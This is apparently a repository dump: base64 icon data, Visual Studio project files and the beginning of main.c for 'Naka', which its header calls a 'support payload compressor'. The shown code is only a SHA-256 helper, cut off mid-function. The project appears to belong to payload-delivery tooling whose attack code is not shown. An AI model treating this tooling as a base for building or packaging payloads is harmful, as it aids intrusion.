AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAACL0+7/pO7+/4fY+f+H2fn/h9n5/4fZ+f+I2fv/idr8/4na/P+J2vz/\nidr8/4na/P+I2fv/iNn6/4fY+f+H2Pn/h9f4/4fX+P+H1/j/h9f4/4fX+f+I2Pr/h9j5/4fY+f+H\n1/j/h9b3/4fX8P9gnbr/AAAAKgAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAIvT7v+q8P7/idv8/4na/P+I2/z/iNv8/4jb/P+I2vv/itv8/4rb/P+L\n2v3/i9r9/4rb/P+J2/z/iNr7/4jZ+v+I2fr/iNn6/4fZ+v+H2Pr/h9j5/4na+/+I2vv/h9n6/4jZ\n+v+I2fr/h9fw/2Cduv8AAAAqAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAi9Pu/7Dy/v+L3f//i93//4vc/v+L3P7/i9z9/4vc/f+K3f7/it3+/4ve\n/v+M3v7/jN39/4zc/f+K2/z/idv8/4nb/P+J2/z/idv7/4nb+/+J2/z/idz9/4nc/f+K2/3/itv9\n/4rb/f+H1/D/YJ26/wAAACoAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAACL0+7/ufX+/4vf//+L3///jN///4zf//+M3///jOD//4zf/v+M3/7/jN/+\n/4zf/v+M3/7/jN/+/4ze/v+L3f7/it39/4rd/f+L3f3/i939/4ve/f+L3v3/i979/4ve/v+L3v7/\ni93+/4fX8P9gnbr/AAAAKgAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAIvT7v+/9v//jeH//43h//+N4P//jeD//43h//+N4f//juL//47i//+O4v//\njuL//47i//+N4v//jOD//4zf//+M3/7/jN/+/4zf/v+M3/7/jN/+/43f/v+N3/7/jOD+/4zg/v+M\n3///h9fw/2Cduv8AAAAqAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAi9Pu/8X4//+O4f//juH//4/i//+P4///j+P//4/j//+N4v//jeL//47i//+O\n4v//juP//47j//+O4v//juL//47h//+N4f//jOD//4zg//+M3///jd///43g//+N4f//jeH//43h\n//+H1/D/YJ26/wAAACoAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAACL0+7/yfn//4/j//+P5P//kOX//5Dl//+P5f//j+X//4/k//+P4///juP//47i\n//+P4///j+P//4/k//+P4///j+P//4/j//+O4///juL//43h//+N4f//juH//4/i//+P4///j+T/\n/4fX8P9gnbr/AAAAKgAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAIvT7v/M+v//keX//5Hm//+R5///kef//5Hn//+R5///kef//5Hn//+Q5f//kOP/\n/4/i//+P4v//j+P//4/l//+99v//u/X//7bz//+s8P//qO7//6ju//+o7v//qO7//6ju//+o7v//\nY6nG/3m61P8AAAAqAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAdb7e/877//+Q5v//kej//5Lo//+S6P//kej//5Ho//+S5///kuf//5Ln//+Q5f//\nj+P//4/i//+P4///tvP//4HL5v9NiaP/UIyn/1OQqv9XlK//YZ+5/2elv/9sqsT/bq3H/26tx/90\nweL/ebrU/wAAACoAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAACL0+7/db7e/7z2//+89f//u/X//7r1//+49P//t/T//7fz//+28///tvP//7bz//+2\n8///tvP//7bz//9st9f/YJ26/26yz/90weL/dMHi/3TB4v90weL/dMHi/3TB4v90weL/dMHi/3TB\n4v95utT/AAAAJQAAAAsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAADdWYnx/0+//aqrE/2qqxP9qqsT/aqrE/2qqxP9qqsT/aqrE/2qqxP9qqsT/aqrE/2qq\nxP9qqsT/aqrE/2qqxP9uss//dMHi/3TH6v/f7PH/3+zx/9/s8f/f7PH/3a2L/8uaef90x+r/dMfq\n/3m61P8AAAAZAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAADdWYnx2v9//dr/f/3W+3v92v93/dr/d/3e/3f93wN7/ecLf/3vD4f99xuL/gMjl\n/4LK5/+Ezen/iNDr/4jQ6/+I0Ov/nNnx////////////////////////rXr/3Z1z/5zZ8f9/vNf/\nIjg/XwAAAA0AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAGS75P+c2fH/nNnx/5zZ8f+c2fH/nNnx/5zZ8f+c2fH/nNnx/3+81/8A\nAAAWAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAJDxGVWS75P9ot9v/aLfb/2i32/9ot9v/aLfb/2m64f9ku+T/JDxGXAAA\nAAYAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCTT4AAAAA\nAAAAPgAAACgAAACAAAAAIAAAAAEAAQAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////AAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAA==\n \n \nAQAAABQAAAAAAAAABAAAAP////8=\n \n \n"
},
{
"path": "Source/Kamikaze/Launcher.html",
"content": ""
},
{
"path": "Source/Naka/Naka.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n ReleaseInternal\n Win32\n \n \n ReleaseInternal\n x64\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n {3BEF8A16-981F-4C65-8AE7-C612B46BE446}\n Win32Proj\n Naka\n 10.0\n \n \n \n Application\n true\n v145\n Unicode\n \n \n Application\n false\n v145\n true\n Unicode\n \n \n Application\n false\n v145\n true\n Unicode\n \n \n Application\n true\n v145\n Unicode\n false\n \n \n Application\n false\n v145\n true\n Unicode\n false\n \n \n Application\n false\n v145\n true\n Unicode\n false\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)32\n SecurityRules.ruleset\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)32\n AllRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)32\n AllRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n AllRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n SecurityRules.ruleset\n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n $(SolutionDir)\n \n \n Windows\n true\n main\n \n \n \n \n \n \n Level4\n Disabled\n _DEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n $(ProjectDir);$(SolutionDir)\n \n \n Windows\n true\n main\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n $(SolutionDir)\n MultiThreaded\n \n \n Windows\n true\n true\n false\n true\n main\n \n \n \n \n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n $(SolutionDir)\n MultiThreaded\n \n \n Windows\n true\n true\n false\n true\n main\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\$(ProjectName)32.exe\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n $(ProjectDir);$(SolutionDir)\n MultiThreaded\n true\n \n \n Windows\n true\n true\n false\n true\n main\n \n \n \n \n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_WINDOWS;%(PreprocessorDefinitions)\n true\n CompileAsC\n $(ProjectDir);$(SolutionDir)\n MultiThreaded\n true\n \n \n Windows\n true\n true\n false\n true\n main\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\$(ProjectName)64.exe\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Naka/Naka.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {13402ae7-3472-4b63-b943-cade7851a002}\n \n \n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n \n \n Header Files\n \n \n minirtl\n \n \n minirtl\n \n \n Header Files\n \n \n"
},
{
"path": "Source/Naka/Naka.vcxproj.user",
"content": "\n\n \n --stable\n WindowsLocalDebugger\n \n \n --stable\n WindowsLocalDebugger\n \n \n WindowsLocalDebugger\n \n \n WindowsLocalDebugger\n \n \n WindowsLocalDebugger\n \n \n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Naka/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2025\n*\n* TITLE: MAIN.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* Naka, support payload compressor.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"naka.h\"\n\n/*\n* CreateSha256HashForBuffer\n*\n* Purpose:\n*\n* Return SHA256 hash for buffer.\n*\n*/\nBOOL CreateSha256HashForBuffer(\n _In_ PBYTE pbBuffer,\n _In_ DWORD cbBuffer,\n _Out_ PBYTE *pbHash,\n _Out_ PDWORD pcbHash\n)\n{\n BCRYPT_ALG_HANDLE hAlgSha256 = NULL, hHashSha256 = NULL;\n BOOL bResult = FALSE;\n\n DWORD cbKeyObject = 0, cbResult = 0;\n\n PBYTE pbKeyObject = NULL;\n HANDLE hHeap = GetProcessHeap();\n\n PBYTE _pbHash = NULL;\n DWORD _cbHash = 0;\n\n do {\n if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(\n 